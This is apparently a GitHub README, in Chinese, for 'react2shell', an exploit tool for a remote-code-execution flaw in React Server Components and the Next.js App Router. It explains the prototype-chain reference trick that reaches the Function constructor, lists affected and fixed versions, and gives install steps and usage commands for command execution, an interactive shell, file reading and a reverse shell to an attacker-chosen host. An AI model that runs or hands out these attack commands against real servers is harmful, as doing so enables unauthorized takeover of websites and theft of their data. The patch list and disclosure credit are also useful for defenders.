rvzsec/react2shell

### 描述 React Server Components（Flight 协议）在反序列化攻击者可控的 `multipart/form-data` 时，未对原型链（prototype-chain）访问进行校验。单个未经过身份验证且带有 `Next-Action` 头的 POST 请求，会通过精心构造的引用链（`$1:__proto__:then` + `$1:constructor:constructor`）到达 `Function` 构造函数，从而导致在服务器上执行远程代码。 影响 `react-server-dom-{webpack,turbopack,parcel}` 19.0.0 - 19.2.0 以及下游使用者，包括 **Next.js** App Router（14.3.0-canary.77+, 15.x, 16.x）。默认的 `create-next-app` 项目均受此漏洞影响。 ### 用法 ``` git clone https://github.com/rvzsec/react2shell cd react2shell pip3 install -r requirements.txt ``` ``` python3 react2shell.py check -t python3 react2shell.py exec -t -c '' python3 react2shell.py shell -t python3 react2shell.py file -t -f -o python3 react2shell.py revshell -t --lhost --lport ``` ### 已修复版本 React 19.0.1 / 19.1.2 / 19.2.1+ - Next.js 15.0.5 / 15.1.9 / 15.2.6 / 15.3.6 / 15.4.8 / 15.5.7 / 16.0.7 ### 致谢 原始披露：[Lachlan Davidson](https://react2shell.com/) ([@lachlan2k](https://github.com/lachlan2k))

标签：CISA项目, Python, Web安全, 安全, 无后门, 网络信息收集, 蓝队分析, 超时处理, 逆向工具